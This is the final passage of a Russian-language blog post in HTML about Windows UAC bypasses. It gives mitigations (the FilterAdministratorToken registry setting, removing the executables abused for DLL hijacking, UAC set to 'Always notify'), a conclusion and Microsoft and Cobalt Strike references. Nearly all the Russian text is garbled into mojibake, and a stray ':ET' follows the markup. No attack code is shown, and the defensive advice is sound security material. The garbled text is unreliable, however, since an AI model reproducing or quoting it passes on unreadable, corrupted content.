–∏—Å–ø–æ–ª—å–∑–æ–≤–∞–Ω–∏–µ–º —É—á–µ—Ç–Ω–æ–π –∑–∞–ø–∏—Å–∏ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞, –µ—Å–ª–∏ —Ç—Ä–µ–±—É—é—Ç—Å—è –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞, –ª—É—á—à–µ –¥–æ–±–∞–≤—å—Ç–µ —Å–≤–æ—é —É—á–µ—Ç–Ω—É—é –∑–∞–ø–∏—Å—å –¥–æ–º–µ–Ω–∞ –≤ –≥—Ä—É–ø–ø—É –ª–æ–∫–∞–ª—å–Ω—ã—Ö –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤.</p>

<p><img src="/assets/img/posts/bypass uac/compmanuac.png" alt="1" class="imghalf" />
<img src="/assets/img/posts/bypass uac/iew8high.png" alt="1" class="imghalf" /></p>

<p>–ï—Å–ª–∏ –ø–æ –∫–∞–∫–æ–π-–ª–∏–±–æ –ø—Ä–∏—á–∏–Ω–µ –Ω–µ–æ–±—Ö–æ–¥–∏–º–æ –≤–æ–π—Ç–∏ –≤ —Å–∏—Å—Ç–µ–º—É —Å –∏—Å–ø–æ–ª—å–∑–æ–≤–∞–Ω–∏–µ–º —É—á–µ—Ç–Ω–æ–π –∑–∞–ø–∏—Å–∏ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞, –ª—É—á—à–µ –≤—Å–µ–≥–æ –≤–∫–ª—é—á–∏—Ç—å —ç—Ç—É –ø–æ–ª–∏—Ç–∏–∫—É UAC.</p>

<p>–ö–æ–Ω—Ç—Ä–æ–ª—å —É—á–µ—Ç–Ω—ã—Ö –∑–∞–ø–∏—Å–µ–π (UAC): —Ä–µ–∂–∏–º –æ–¥–æ–±—Ä–µ–Ω–∏—è –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º (Admin Approval Mode) –¥–ª—è –≤—Å—Ç—Ä–æ–µ–Ω–Ω–æ–π —É—á–µ—Ç–Ω–æ–π –∑–∞–ø–∏—Å–∏ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>‚ÄúFilterAdministratorToken‚Äù=dword:00000001
</code></pre></div></div>

<p>–î—Ä—É–≥–æ–π –≤–∞—Ä–∏–∞–Ω—Ç - —ç—Ç–æ –ø–µ—Ä–µ–∏–º–µ–Ω–æ–≤–∞–Ω–∏–µ –∏–ª–∏ —É–¥–∞–ª–µ–Ω–∏–µ –∏—Å–ø–æ–ª–Ω—è–µ–º—ã—Ö —Ñ–∞–π–ª–æ–≤ Mcx2Prov.exe, sysprep.exe, cliconfg.exe –∏ pwcreator.exe, –µ—Å–ª–∏ —ç—Ç–æ –Ω–µ —Ç—Ä–µ–±—É–µ—Ç—Å—è –≤ —Å–∏—Å—Ç–µ–º–µ, —á—Ç–æ–±—ã –≤—Ç–æ—Ä–æ–π —ç—Ç–∞–ø —ç–∫—Å–ø–ª—É–∞—Ç–∞—Ü–∏–∏ DLL  hijacking –ø—Ä–æ–≤–∞–ª–∏–ª—Å—è.</p>

<p>–ù–∞–∫–æ–Ω–µ—Ü, –µ—Å–ª–∏ –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è–º —Ç—Ä–µ–±—É—é—Ç—Å—è –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ —Ç–æ–≥–¥–∞ —Å—Ç–æ–∏—Ç —É—Å—Ç–∞–Ω–æ–≤–∏—Ç—å –ø–æ–ª–∏—Ç–∏–∫—É UAC —Å–≤–æ–µ–≥–æ –∫–æ–º–ø—å—é—Ç–µ—Ä–∞ –Ω–∞ ¬´–í—Å–µ–≥–¥–∞ —É–≤–µ–¥–æ–º–ª—è—Ç—å¬ª –∏ –ø–æ–∑–≤–æ–ª–∏—Ç—å –∏–º –∂–∏—Ç—å —Å –ø–æ—Å—Ç–æ—è–Ω–Ω—ã–º–∏ —É–≤–µ–¥–æ–º–ª–µ–Ω–∏—è–º–∏.</p>

<p>–ö–æ–Ω—Ç—Ä–æ–ª—å —É—á–µ—Ç–Ω—ã—Ö –∑–∞–ø–∏—Å–µ–π (UAC): –ø–æ–≤–µ–¥–µ–Ω–∏–µ –∑–∞–ø—Ä–æ—Å–∞ –Ω–∞ –ø–æ–≤—ã—à–µ–Ω–∏–µ –ø—Ä–∞–≤ –¥–ª—è –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–≤ –≤ —Ä–µ–∂–∏–º–µ –æ–¥–æ–±—Ä–µ–Ω–∏—è –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–æ–º (Admin Approval Mode), 2-–π –∑–∞–ø—Ä–æ—Å —Å–æ–≥–ª–∞—Å–∏—è –Ω–∞ –∑–∞—â–∏—â–µ–Ω–Ω—ã–π –¥–µ—Å–∫—Ç–æ–ø</p>

<h1 id="–∑–∞–∫–ª—é—á–µ–Ω–∏–µ">–ó–∞–∫–ª—é—á–µ–Ω–∏–µ</h1>
<p>–≠—Ç–æ—Ç –æ–±—Ö–æ–¥ —Ä–∞–±–æ—Ç–∞–µ—Ç —Ç–æ–ª—å–∫–æ –≤ —Å–ª—É—á–∞–µ –∫–æ–≥–¥–∞ —É–¥–æ–≤–ª–µ—Ç–≤–æ—Ä—è—Ç—Å—è –≤—Å–µ —Ç—Ä–µ–±–æ–≤–∞–Ω–∏—è –¥–ª—è –∏—Ö —ç–∫—Å–ø–ª–æ–∏–Ω–≥–∞. –ù–µ –¥–æ—Å—Ç–∞—ë—Ç –æ–¥–Ω–æ–≥–æ —Ç—Ä–µ–±–æ–≤–∞–Ω–∏—è –∏ –æ–±—Ö–æ–¥ –Ω–µ —É–¥–∞—Å—Ç—Å—è. –û—Ñ–∏—Å–Ω—ã–µ –¥–æ–∫—É–º–µ–Ω—Ç—ã –æ—Ç–∫—Ä—ã–≤–∞—é—Ç—Å—è –≤ —Å—Ä–µ–¥–Ω–µ–π —Ü–µ–ª–æ—Å—Ç–Ω–æ—Å—Ç–∏, –ø–æ—ç—Ç–æ–º—É –æ–Ω–∏ —è–≤–ª—è—é—Ç—Å—è –∏–¥–µ–∞–ª—å–Ω—ã–º–∏ —Ü–µ–ª—è–º–∏ –¥–ª—è –æ–±—Ö–æ–¥–∞ UAC. –ü–æ—Å–∫–æ–ª—å–∫—É —ç—Ç–∏ –æ–±—Ö–æ–¥—ã –æ—Å—É—â–µ—Å—Ç–≤–ª—è—é—Ç—Å—è –±–µ–∑ –æ—Å–æ–±—ã—Ö —É—Å–∏–ª–∏–π, –µ–¥–∏–Ω—Å—Ç–≤–µ–Ω–Ω—ã–º —Ä–µ–∞–ª—å–Ω—ã–º —Å–ø–æ—Å–æ–±–æ–º –ø—Ä–æ—Ç–∏–≤–æ-–¥–µ–π—Å—Ç–≤–∏–π –±—ã–ª–æ –±—ã —É—Å—Ç–∞–Ω–æ–≤–∏—Ç—å –¥–ª—è UAC ¬´–í—Å–µ–≥–¥–∞ —É–≤–µ–¥–æ–º–ª—è—Ç—å¬ª –∏–ª–∏ —É–¥–∞–ª–∏—Ç—å –ø—Ä–∞–≤–∞ –ª–æ–∫–∞–ª—å–Ω–æ–≥–æ –∞–¥–º–∏–Ω–∏—Å—Ç—Ä–∞—Ç–æ—Ä–∞ –¥–ª—è –ø–æ–ª—å–∑–æ–≤–∞—Ç–µ–ª—è. –í –∫–æ–Ω—Ü–µ –∫–æ–Ω—Ü–æ–≤, –∏—Å–ø–æ–ª—å–∑–æ–≤–∞–Ω–∏–µ —Ç–∞–∫–∏—Ö –∞–≥–µ–Ω—Ç–æ–≤ –∫–∞–∫ Microsoft EMET –∏–ª–∏ MalwareBytes Anti-Exploit, –±—ã–ª–æ –±—ã –Ω–∞–∏–ª—É—á—à–∏–º —Ä–µ—à–µ–Ω–∏–µ–º –¥–ª—è —Å–º—è–≥—á–µ–Ω–∏—è —É—Ä–æ–Ω–∞ –Ω–∞ —Ä–∞–Ω–Ω–∏—Ö —Å—Ç–∞–¥–∏—è—Ö –ø—Ä–æ–≤–µ–¥–µ–Ω–∏—è –∞—Ç–∞–∫–∏.</p>

<h1 id="—Å—Å—ã–ª–∫–∏">–°—Å—ã–ª–∫–∏</h1>
<blockquote>
  <p><a href="http://technet.microsoft.com/en-us/magazine/2009.07.uac.aspx">http://technet.microsoft.com/en-us/magazine/2009.07.uac.aspx</a>
<a href="http://technet.microsoft.com/en-us/magazine/2007.06.uac.aspx">http://technet.microsoft.com/en-us/magazine/2007.06.uac.aspx</a>
<a href="http://windows.microsoft.com/en-gb/windows/what-is-user-account-control#1TC=windows-7">http://windows.microsoft.com/en-gb/windows/what-is-user-account-control#1TC=windows-7</a>
<a href="http://windows.microsoft.com/en-gb/windows/what-are-user-account-control-settings#1TC=windows-7">http://windows.microsoft.com/en-gb/windows/what-are-user-account-control-settings#1TC=windows-7</a>
<a href="http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know">http://blog.cobaltstrike.com/2014/03/20/user-account-control-what-penetration-testers-should-know</a></p>
</blockquote>
:ET